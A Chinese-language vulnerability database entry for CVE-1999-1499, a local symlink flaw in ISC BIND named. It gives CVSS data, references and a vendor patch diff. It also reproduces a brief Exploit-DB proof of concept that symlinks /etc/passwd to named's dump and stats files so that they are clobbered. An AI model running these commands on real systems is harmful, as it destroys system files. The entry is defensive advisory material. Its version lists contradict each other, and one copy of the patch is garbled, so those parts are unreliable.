CVE-1999-1499
CVSS2.1
发布时间 :1998-04-10 00:00:00
修订时间 :2008-09-05 16:19:40
NMCOES    

[原文]named in ISC BIND 4.9 and 8.1 allows local users to destroy files via a symlink attack on (1) named_dump.db when root kills the process with a SIGINT, or (2) named.stats when SIGIOT is used.


[CNNVD]SIGINT,SIGIO ISC BIND符号链接漏洞(CNNVD-199804-022)

        ISC BIND 4.9和8.1版本中的named存在漏洞。本地用户借助对(1)当根目录用一个SIGINT杀死进程的named_dump.db,或者(2)当使用SIGIOT的named.stats进行符号链接攻击摧毁文件。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:isc:bind:8.1ISC BIND 8.1
cpe:/a:isc:bind:4.9ISC BIND 4.9

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1499
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1499
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199804-022
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/80
(VENDOR_ADVISORY)  BID  80
http://www.securityfocus.com/archive/1/8966
(VENDOR_ADVISORY)  BUGTRAQ  19980410 BIND 4.9.7 named follows symlinks, clobbers anything

- 漏洞信息

SIGINT,SIGIO ISC BIND符号链接漏洞
低危 其他
1998-04-10 00:00:00 2005-10-20 00:00:00
本地  
        ISC BIND 4.9和8.1版本中的named存在漏洞。本地用户借助对(1)当根目录用一个SIGINT杀死进程的named_dump.db,或者(2)当使用SIGIOT的named.stats进行符号链接攻击摧毁文件。

- 公告与补丁

        Upgrade to BIND 4.9.7, BIND 8.1.x or apply the following
        patch.
        *** named/ns_init.c.000 Mon Jun 2 06:34:35 1997
        --- named/ns_init.c Sun Apr 12 13:12:05 1998
        ***************
        *** 560,567 ****
         * We will always transfer this zone again
         * after a reload.
         */
        ! sprintf(buf, "/NsTmp%ld.%d", _PATH_TMPDIR,
        ! (long)getpid(), tmpnum++);
         source = savestr(buf);
         zp->z_flags |= Z_TMP_FILE;
         } else
        --- 560,567 ----
         * We will always transfer this zone again
         * after a reload.
         */
        ! sprintf(buf, "NsTmp%ld.%d", (long)getpid(),
        ! tmpnum++);
         source = savestr(buf);
         zp->z_flags |= Z_TMP_FILE;
         } else
        *** named/ns_main.c.000 Mon Jun 2 06:34:36 1997
        --- named/ns_main.c Sun Apr 12 14:51:45 1998
        ***************
        *** 1463,1469 ****
         dprintf(1, (ddt, "sigprof()\n"));
         if (fork() == 0)
         {
        - (void) chdir(_PATH_TMPDIR);
         exit(1);
         }
         errno = save_errno;
        --- 1463,1468 ----
        *** named/pathnames.h.000 Thu Dec 15 17:24:22 1994
        --- named/pathnames.h Sat Apr 11 10:57:45 1998
        ***************
        *** 74,88 ****
         #ifndef _PATH_XFER
         # define _PATH_XFER "/usr/libexec/named-xfer"
         #endif
        ! #define _PATH_DEBUG "/var/tmp/named.run"
        ! #define _PATH_DUMPFILE "/var/tmp/named_dump.db"
         #ifndef _PATH_PIDFILE
         # define _PATH_PIDFILE "/var/run/named.pid"
         #endif
        ! #define _PATH_STATS "/var/tmp/named.stats"
        ! #define _PATH_XFERTRACE "/var/tmp/xfer.trace"
        ! #define _PATH_XFERDDT "/var/tmp/xfer.ddt"
        ! #define _PATH_TMPXFER "/var/tmp/xfer.ddt.XXXXXX"
         #define _PATH_TMPDIR "/var/tmp"
         #else /* BSD */
        --- 74,88 ----
         #ifndef _PATH_XFER
         # define _PATH_XFER "/usr/libexec/named-xfer"
         #endif
        ! #define _PATH_DEBUG "named.run"
        ! #define _PATH_DUMPFILE "named_dump.db"
         #ifndef _PATH_PIDFILE
         # define _PATH_PIDFILE "/var/run/named.pid"
         #endif
        ! #define _PATH_STATS "named.stats"
        ! #define _PATH_XFERTRACE "xfer.trace"
        ! #define _PATH_XFERDDT "xfer.ddt"
        ! #define _PATH_TMPXFER "xfer.ddt.XXXXXX"
         #define _PATH_TMPDIR "/var/tmp"
         #else /* BSD */
        ***************
        *** 92,106 ****
         #ifndef _PATH_XFER
         # define _PATH_XFER "/etc/named-xfer"
         #endif
        ! #define _PATH_DEBUG "/usr/tmp/named.run"
        ! #define _PATH_DUMPFILE "/usr/tmp/named_dump.db"
         #ifndef _PATH_PIDFILE
         # define _PATH_PIDFILE "/etc/named.pid"
         #endif
        ! #define _PATH_STATS "/usr/tmp/named.stats"
        ! #define _PATH_XFERTRACE "/usr/tmp/xfer.trace"
        ! #define _PATH_XFERDDT "/usr/tmp/xfer.ddt"
        ! #define _PATH_TMPXFER "/usr/tmp/xfer.ddt.XXXXXX"
         #define _PATH_TMPDIR "/usr/tmp"
         #endif /* BSD */
        --- 92,106 ----
         #ifndef _PATH_XFER
         # define _PATH_XFER "/etc/named-xfer"
         #endif
        ! #define _PATH_DEBUG "named.run"
        ! #define _PATH_DUMPFILE "named_dump.db"
         #ifndef _PATH_PIDFILE
         # define _PATH_PIDFILE "/etc/named.pid"
         #endif
        ! #define _PATH_STATS "named.stats"
        ! #define _PATH_XFERTRACE "xfer.trace"
        ! #define _PATH_XFERDDT "xfer.ddt"
        ! #define _PATH_TMPXFER "xfer.ddt.XXXXXX"
         #define _PATH_TMPDIR "/usr/tmp"
         #endif /* BSD */

- 漏洞信息 (19072)

ISC BIND 4.9.7 -T1B named SIGINT and SIGIOT symlink Vulnerability (EDBID:19072)
linux local
1998-04-10 Verified
0 Joe H
N/A [点击下载]
source: http://www.securityfocus.com/bid/80/info

The named daemon will dump the named database to /var/tmp/named_dump.db
when it receives a SIGINT signal. It does not check for symbolic links while
doing so and can be made to overwrite any file in the system.

The named daemons will append named statistics to /var/tmp/named.stats
when it receives a SIGIOT signal. It does not check for symbolic links while
doing so and ca be made to append to any file in the system.

BIND 8.1.x is not vulnerable as it uses a private directory specified in
named.{boot,conf} for temporary and debug dumps.

$ ls -l /var/tmp/named_dump.db
/var/tmp/named_dump.db not found
$ ls -l /var/tmp/named.stats
/var/tmp/named.stats not found
$ ln -s /etc/passwd /var/tmp/named_dump.db
$ ln -s /etc/passwd /var/tmp/named.stats

[ wait for root to send a SIGINT or SIGIOT to named ]		

- 漏洞信息

59272
ISC BIND named Multiple Symlink Arbitrary File Overwrite
Local Access Required Input Manipulation, Race Condition
Loss of Integrity Patch / RCS, Upgrade
Vendor Verified

- 漏洞描述

- 时间线

1998-04-10 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 4.9.7, 8.1.x, or higher, as it has been reported to fix this vulnerability. In addition, a patch has been released for some older versions.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

ISC BIND named SIGINT and SIGIOT symlink Vulnerability
Access Validation Error 80
No No
1998-04-10 12:00:00 2009-07-11 12:16:00
Made public in ""BIND 4.9.7 named follows symlinks, clobbers anything." by Joe H. <joe@blarg.net> to BugTraq on April 10, 1998.

- 受影响的程序版本

ISC BIND 4.9.7 -T1B
ISC BIND 8.1.2
+ HP HP-UX 11.11
+ HP HP-UX 11.0
ISC BIND 8.1.1
ISC BIND 8.1
ISC BIND 4.9.7
+ HP HP-UX 11.0 4
+ HP HP-UX 11.0
+ HP HP-UX 10.24
+ HP HP-UX 10.20
+ HP HP-UX 10.10

- 不受影响的程序版本

ISC BIND 8.1.2
+ HP HP-UX 11.11
+ HP HP-UX 11.0
ISC BIND 8.1.1
ISC BIND 8.1
ISC BIND 4.9.7
+ HP HP-UX 11.0 4
+ HP HP-UX 11.0
+ HP HP-UX 10.24
+ HP HP-UX 10.20
+ HP HP-UX 10.10

- 漏洞讨论

The named daemon will dump the named database to /var/tmp/named_dump.db
when it receives a SIGINT signal. It does not check for symbolic links while
doing so and can be made to overwrite any file in the system.

The named daemons will append named statistics to /var/tmp/named.stats
when it receives a SIGIOT signal. It does not check for symbolic links while
doing so and ca be made to append to any file in the system.

BIND 8.1.x is not vulnerable as it uses a private directory specified in
named.{boot,conf} for temporary and debug dumps.

- 漏洞利用

$ ls -l /var/tmp/named_dump.db
/var/tmp/named_dump.db not found
$ ls -l /var/tmp/named.stats
/var/tmp/named.stats not found
$ ln -s /etc/passwd /var/tmp/named_dump.db
$ ln -s /etc/passwd /var/tmp/named.stats

[ wait for root to send a SIGINT or SIGIOT to named ]

- 解决方案

Upgrade to BIND 4.9.7, BIND 8.1.x or apply the following
patch.

*** named/ns_init.c.000 Mon Jun 2 06:34:35 1997
--- named/ns_init.c Sun Apr 12 13:12:05 1998
***************
*** 560,567 ****
* We will always transfer this zone again
* after a reload.
*/
! sprintf(buf, "%s/NsTmp%ld.%d", _PATH_TMPDIR,
! (long)getpid(), tmpnum++);
source = savestr(buf);
zp->z_flags |= Z_TMP_FILE;
} else
--- 560,567 ----
* We will always transfer this zone again
* after a reload.
*/
! sprintf(buf, "NsTmp%ld.%d", (long)getpid(),
! tmpnum++);
source = savestr(buf);
zp->z_flags |= Z_TMP_FILE;
} else
*** named/ns_main.c.000 Mon Jun 2 06:34:36 1997
--- named/ns_main.c Sun Apr 12 14:51:45 1998
***************
*** 1463,1469 ****
dprintf(1, (ddt, "sigprof()\n"));
if (fork() == 0)
{
- (void) chdir(_PATH_TMPDIR);
exit(1);
}
errno = save_errno;
--- 1463,1468 ----
*** named/pathnames.h.000 Thu Dec 15 17:24:22 1994
--- named/pathnames.h Sat Apr 11 10:57:45 1998
***************
*** 74,88 ****
#ifndef _PATH_XFER
# define _PATH_XFER "/usr/libexec/named-xfer"
#endif
! #define _PATH_DEBUG "/var/tmp/named.run"
! #define _PATH_DUMPFILE "/var/tmp/named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/var/run/named.pid"
#endif
! #define _PATH_STATS "/var/tmp/named.stats"
! #define _PATH_XFERTRACE "/var/tmp/xfer.trace"
! #define _PATH_XFERDDT "/var/tmp/xfer.ddt"
! #define _PATH_TMPXFER "/var/tmp/xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/var/tmp"

#else /* BSD */
--- 74,88 ----
#ifndef _PATH_XFER
# define _PATH_XFER "/usr/libexec/named-xfer"
#endif
! #define _PATH_DEBUG "named.run"
! #define _PATH_DUMPFILE "named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/var/run/named.pid"
#endif
! #define _PATH_STATS "named.stats"
! #define _PATH_XFERTRACE "xfer.trace"
! #define _PATH_XFERDDT "xfer.ddt"
! #define _PATH_TMPXFER "xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/var/tmp"

#else /* BSD */
***************
*** 92,106 ****
#ifndef _PATH_XFER
# define _PATH_XFER "/etc/named-xfer"
#endif
! #define _PATH_DEBUG "/usr/tmp/named.run"
! #define _PATH_DUMPFILE "/usr/tmp/named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/etc/named.pid"
#endif
! #define _PATH_STATS "/usr/tmp/named.stats"
! #define _PATH_XFERTRACE "/usr/tmp/xfer.trace"
! #define _PATH_XFERDDT "/usr/tmp/xfer.ddt"
! #define _PATH_TMPXFER "/usr/tmp/xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/usr/tmp"
#endif /* BSD */

--- 92,106 ----
#ifndef _PATH_XFER
# define _PATH_XFER "/etc/named-xfer"
#endif
! #define _PATH_DEBUG "named.run"
! #define _PATH_DUMPFILE "named_dump.db"
#ifndef _PATH_PIDFILE
# define _PATH_PIDFILE "/etc/named.pid"
#endif
! #define _PATH_STATS "named.stats"
! #define _PATH_XFERTRACE "xfer.trace"
! #define _PATH_XFERDDT "xfer.ddt"
! #define _PATH_TMPXFER "xfer.ddt.XXXXXX"
#define _PATH_TMPDIR "/usr/tmp"
#endif /* BSD */

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站